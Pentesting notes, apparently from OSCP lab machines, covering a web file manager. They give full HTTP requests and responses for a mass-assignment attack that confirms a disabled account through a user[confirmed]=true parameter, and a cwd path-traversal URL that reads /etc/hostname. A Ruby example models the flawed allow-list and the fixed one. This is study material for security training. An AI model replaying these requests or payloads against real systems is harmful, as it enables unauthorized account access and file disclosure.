Pentesting Filemanager
Default credentials
If the application allows registration, there is a vulnerability in the email approval:
You can browse to http://192.168.108.231/ and register a user. That user will be disabled, but there is a feature for updating the email address that the confirmation is sent to. If we update the email, note the request:
| POST /settings/email HTTP/1.1
Host: 192.168.108.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.108.231/register/confirmation
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-CSRF-Token: jU7YlbEk-fJ2rxnMLbHOuLtRgFDkvJ9T6dG_yFJ4KnYNsRClJoReJXDWu79D851m7wtJNGeUVi0gQjeAkRk34Q
Content-Length: 188
Origin: http://192.168.108.231
Connection: keep-alive
Cookie: _boolean_session=efqmLjaUhvVwL9FTK7PcfsaBU8%2FHyK%2BKjqQhiKBfXg5IeMGx9FgpEOHuA6iZPm4oTDhcazyXDZsv3mqoANd2%2FPMzIawKqub2yn%2BIb0DSXC2d65%2BU%2B6dQZxA8j95ONmgViKjuOp%2B%2B6vWYFX0w9QE9wgM0uZeK3k0ENouQFbHe4CctWuKpX1v2C03da%2Ba9nUbb4nTOj7ujeAZjJQXtIIk%2BhoMzbY7hudxCHE8ZQ3TcewW8sbH6304znd%2F2aldKvDzN5roT6NYNmbi7vpmzC1MEoAmP6U17Mzr58See7fZ%2FL26%2Bc60PpQMoiw%3D%3D--IOslTlUAwizpZt9z--bSQuTZgN7u5vZVR9uOheVg%3D%3D
Priority: u=0

_method=patch&authenticity_token=jU7YlbEk-fJ2rxnMLbHOuLtRgFDkvJ9T6dG_yFJ4KnYNsRClJoReJXDWu79D851m7wtJNGeUVi0gQjeAkRk34Q&user%5Bemail%5D=lala%40lala.com&confirmed=true&commit=Change%20email
|
And note the response:
| HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Content-Type: application/json; charset=utf-8
Vary: Accept
ETag: W/"f71d3fd83aa3c9e6fdc84abcb05af92b"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: _boolean_session=vkkbGf9Od%2FIz3E0AgxragQ61gE3dTUAF041c64Ufk7hsZTqcUlNwtb1xjenWOkKJYwtdwpIHLBga2CYEYbjt1pQudKD0%2BoP17%2BzOjKI7w8638dS8%2BXnhzL2sy1K3JU3042dccj3Fl%2FNSRCFbQiOk7L%2B0hxyah5eu%2FjdSzExr8OmdHbqVJCzrRA6fF4cXKDFOB8gXhemj9Fr7SLOefT5yl%2BGhBsMuzqHchd4EEpMbbt3aXf0Y%2B5gKiivFcXGp1nyYilob96PXjU%2BaWmalbvvlTyCbuOKWqINYrZ1013XTuKafL8UpzD2pFQ%3D%3D--FHRuVvzEyO5zbcv6--%2Bo0j4K2pEIieQT%2B%2FNjqs%2Bw%3D%3D; path=/; HttpOnly; SameSite=Lax
X-Request-Id: d5410efe-8400-47ac-9b7f-d336307984c4
X-Runtime: 0.008355
Content-Length: 150

{"email":"lala@lala.com","id":2,"username":"admin2","confirmed":false,"created_at":"2026-02-13T22:15:30.099Z","updated_at":"2026-02-13T22:15:30.099Z"}
|
If we include the parameter confirmed as true inside the user object (user[confirmed]=true), the account will be confirmed. See the request:
| POST /settings/email HTTP/1.1
Host: 192.168.108.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.108.231/register/confirmation
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-CSRF-Token: jU7YlbEk-fJ2rxnMLbHOuLtRgFDkvJ9T6dG_yFJ4KnYNsRClJoReJXDWu79D851m7wtJNGeUVi0gQjeAkRk34Q
Content-Length: 108
Origin: http://192.168.108.231
Connection: keep-alive
Cookie: _boolean_session=efqmLjaUhvVwL9FTK7PcfsaBU8%2FHyK%2BKjqQhiKBfXg5IeMGx9FgpEOHuA6iZPm4oTDhcazyXDZsv3mqoANd2%2FPMzIawKqub2yn%2BIb0DSXC2d65%2BU%2B6dQZxA8j95ONmgViKjuOp%2B%2B6vWYFX0w9QE9wgM0uZeK3k0ENouQFbHe4CctWuKpX1v2C03da%2Ba9nUbb4nTOj7ujeAZjJQXtIIk%2BhoMzbY7hudxCHE8ZQ3TcewW8sbH6304znd%2F2aldKvDzN5roT6NYNmbi7vpmzC1MEoAmP6U17Mzr58See7fZ%2FL26%2Bc60PpQMoiw%3D%3D--IOslTlUAwizpZt9z--bSQuTZgN7u5vZVR9uOheVg%3D%3D
Priority: u=0

_method=patch&authenticity_token=&user[id]=1&user[username]=admin&user[confirmed]=true&commit=Change%20email
|
Then the response is:
| {"confirmed":true,"id":2,"username":"admin2","email":"lala@lala.com","created_at":"2026-02-13T22:15:30.099Z","updated_at":"2026-02-13T22:33:14.621Z"}
|
Now click on the Boolean icon to navigate to the Filemanager application.
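The root cause of the behaviour above is a mass-assignment flaw: the email-change endpoint accepts a user attribute it should never take from the client. The following is an added example in plain Ruby, not the application's code, modelling the server-side allow-list with the weak setting beside the corrected one. The request bodies are modelled on the two requests above; the allow-lists, the record and the helper names `user_params` and `apply_update` are assumptions made for illustration.

```ruby
require "uri"

# Bodies modelled on the two requests above; the CSRF token is replaced by a
# constructed placeholder and the new email address is constructed.
BODY_TOP_LEVEL = "_method=patch&authenticity_token=TOKEN&user%5Bemail%5D=new%40lala.com" \
                 "&confirmed=true&commit=Change%20email"
BODY_NESTED = "_method=patch&authenticity_token=&user[id]=1&user[username]=admin" \
              "&user[confirmed]=true&commit=Change%20email"

# Assumption: allow-list consistent with the responses above, where
# user[confirmed] was applied but user[id] and user[username] were not.
PERMIT_OBSERVED = %w[email confirmed].freeze
# Hardened allow-list: the email form may change the email and nothing else.
PERMIT_HARDENED = %w[email].freeze

# Constructed record matching the first JSON response (values kept as strings;
# a real ORM would cast them).
ACCOUNT = { "id" => "2", "username" => "admin2",
            "email" => "lala@lala.com", "confirmed" => "false" }.freeze

# Extract only the nested user[...] attributes from a form-encoded body.
# A top-level confirmed=true is not a user attribute and is ignored.
def user_params(body)
  URI.decode_www_form(body).each_with_object({}) do |(key, value), out|
    match = key.match(/\Auser\[(\w+)\]\z/)
    out[match[1]] = value if match
  end
end

# Apply an update through an allow-list. Returns the new record and the
# attribute names that were submitted but rejected, for logging or alerting.
def apply_update(record, body, permitted)
  params = user_params(body)
  [record.merge(params.slice(*permitted)), params.keys - permitted]
end

if __FILE__ == $PROGRAM_NAME
  [PERMIT_OBSERVED, PERMIT_HARDENED].each do |permitted|
    record, rejected = apply_update(ACCOUNT, BODY_NESTED, permitted)
    puts "permit=#{permitted.inspect} confirmed=#{record['confirmed']} rejected=#{rejected.inspect}"
  end
end
```

The rejected list is also a detection signal: a request to the email form that carries `user[id]`, `user[username]` or `user[confirmed]` did not come from the unmodified form.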
Path traversal
If the application includes the parameter cwd, we may inject a path traversal, like this:
| http://192.168.108.231/?cwd=../../../../../../../../../../../../../../../../../../etc/hostname
|
Labs
OSCP Boolean
OSCP Filemanager
Last update: 2026-02-15
Created: February 15, 2026 15:52:07